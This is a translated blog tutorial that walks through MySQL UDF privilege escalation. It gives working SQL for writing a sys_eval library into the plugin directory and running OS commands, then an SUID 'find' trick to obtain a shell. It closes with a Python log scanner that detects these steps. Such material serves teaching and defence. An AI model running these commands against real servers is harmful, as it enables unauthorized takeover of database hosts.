[Try to Hack] UDF privilege escalation
2022-07-28 12:16:00 【Hua Weiyun】
Blog home page: Happy star's blog home page
Series column: Try to Hack
First published: 2022-07-11
The author's level is very limited. If you find an error, please let me know, thanks!
A lot of the content comes from this article and this article.
UDF overview
A UDF (user-defined function) is an extension interface of MySQL that lets you add functions to MySQL. For example, if MySQL lacks some function, I can add it through a UDF and then use that function inside MySQL.
Prerequisites:
- You know the MySQL user name and password, and you can log in remotely.
- MySQL has permission to write files, i.e. the value of secure_file_priv is empty.
Does MySQL have permission to write files?
secure_file_priv restricts which directory load dumpfile, into outfile and load_file() may operate in.
1) When the value of secure_file_priv is NULL, mysqld is not allowed to import or export at all, so privilege escalation is not possible.
2) When the value of secure_file_priv is /tmp/, mysqld can import and export only under the /tmp/ directory, so privilege escalation is not possible either.
3) When secure_file_priv has no specific value, mysqld import and export are not restricted, and privilege escalation is possible.
show global variables like '%secure%';
Upload the UDF dynamic link library file
A dynamic link library is one way of implementing a shared function library. On Windows the file suffix is .dll, on Linux it is .so. We place this file in a specific directory; it contains functions that execute system commands.
1. MySQL version greater than 5.1: the udf.dll file must be placed in the lib\plugin folder under the MySQL installation directory. (The plugin folder does not exist by default and has to be created.)
2. MySQL version less than 5.1:
If it is a Win 2000 server, export the udf.dll file to C:\Windows\udf.dll.
If it is a Win2003 server, export the udf.dll file to C:\Windows\udf.dll.
select version();  # check the MySQL version
select @@basedir;  # get the MySQL installation directory
show variables like 'plugin%';  # this command alone is enough
Get the database and operating system architecture (different operating systems and bit widths need different dynamic link libraries):
select @@version_compile_os, @@version_compile_machine;
Where to get the dynamic link library (both sqlmap and msf include one):
In msf it is under /usr/share/metasploit-framework/data/exploits/mysql/
Write the dll file into the plugin directory
select hex(load_file('D:\\lib_mysqludf_sys64.dll')) into dumpfile 'E:\\mysql-5.7.24-winx64\\lib\\plugin\\udf.dll';  # on Windows the backslashes in the path must be escaped by doubling them
Create the custom function
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';
View the created sys_eval function
select * from mysql.func where name = 'sys_eval';
Run system commands
select sys_eval('whoami');
select sys_eval('chmod u+s /usr/bin/find');  # give the find command the SUID bit
Then use the SUID find to escalate privileges:
find . -exec /bin/sh \;
The exploit/multi/mysql/mysql_udf_payload module in MSF can also perform UDF privilege escalation. See this article.
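Seen from the defending side, the steps above leave distinctive statements in the MySQL general query log. The following is an added example, not code from the original post: it flags library writes into the plugin directory, CREATE FUNCTION ... SONAME, and later calls to the created function, while write_permitted mirrors the three secure_file_priv cases listed earlier. The function names, the one-statement-per-line log layout and the sample lines are assumptions constructed for illustration.

```python
import re

DUMPFILE = re.compile(r"into\s+dumpfile\s+'([^']+)'", re.I)
CREATE_UDF = re.compile(
    r"create\s+(?:aggregate\s+)?function\s+(?:if\s+not\s+exists\s+)?(\w+)"
    r"\s+returns\s+\w+\s+soname\s+'([^']+)'", re.I)
CALL = re.compile(r"\b(\w+)\s*\(")

def norm(path):
    # Fold SQL-escaped and plain backslashes to "/" so paths compare lexically.
    return path.replace("\\\\", "/").replace("\\", "/").lower().rstrip("/")

def write_permitted(secure_file_priv, target):
    # NULL (None) disables import/export, "" lifts the restriction,
    # any other value confines file writes to that directory (lexical check only).
    if secure_file_priv is None:
        return False
    if secure_file_priv == "":
        return True
    return norm(target).startswith(norm(secure_file_priv) + "/")

def scan(lines, plugin_dir, known_udfs=("sys_eval",)):
    # Returns (line number, finding kind, detail) for each suspicious statement.
    names = {n.lower() for n in known_udfs}
    pdir, findings = norm(plugin_dir) + "/", []
    for n, line in enumerate(lines, 1):
        m = DUMPFILE.search(line)
        if m and (norm(m.group(1)).startswith(pdir)
                  or norm(m.group(1)).endswith((".dll", ".so"))):
            findings.append((n, "library-write", m.group(1)))
        m = CREATE_UDF.search(line)
        if m:
            names.add(m.group(1).lower())  # track newly registered UDF names
            findings.append((n, "udf-create", m.group(1) + " -> " + m.group(2)))
        for name in sorted({w.lower() for w in CALL.findall(line)} & names):
            findings.append((n, "udf-call", name))
    return findings

# Constructed sample: general-query-log style lines built from this page's statements.
SAMPLE = [
    r"12 Query show global variables like '%secure%'",
    r"12 Query select hex(load_file('D:\\lib_mysqludf_sys64.dll')) into dumpfile 'E:\\mysql-5.7.24-winx64\\lib\\plugin\\udf.dll'",
    r"12 Query CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll'",
    r"12 Query select sys_eval('whoami')",
    r"13 Query select name from customers into outfile '/tmp/report.csv'",
]
PLUGIN_DIR = "E:/mysql-5.7.24-winx64/lib/plugin/"

if __name__ == "__main__":
    for finding in scan(SAMPLE, PLUGIN_DIR):
        print(finding)
```

Rows in mysql.func that nobody on the team registered deserve the same attention as a hit from this scan.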